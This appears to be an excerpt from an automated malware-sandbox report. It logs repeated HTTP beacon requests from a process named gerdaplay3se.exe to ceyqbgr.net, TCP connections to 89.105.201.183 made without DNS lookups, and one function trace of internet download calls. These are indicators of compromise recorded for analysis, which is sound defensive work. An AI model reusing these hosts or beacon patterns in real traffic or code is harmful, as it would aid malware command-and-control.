        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 91.211.247.248
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D672AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free,3_2_02D672AB
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf815c5ee949b32 HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
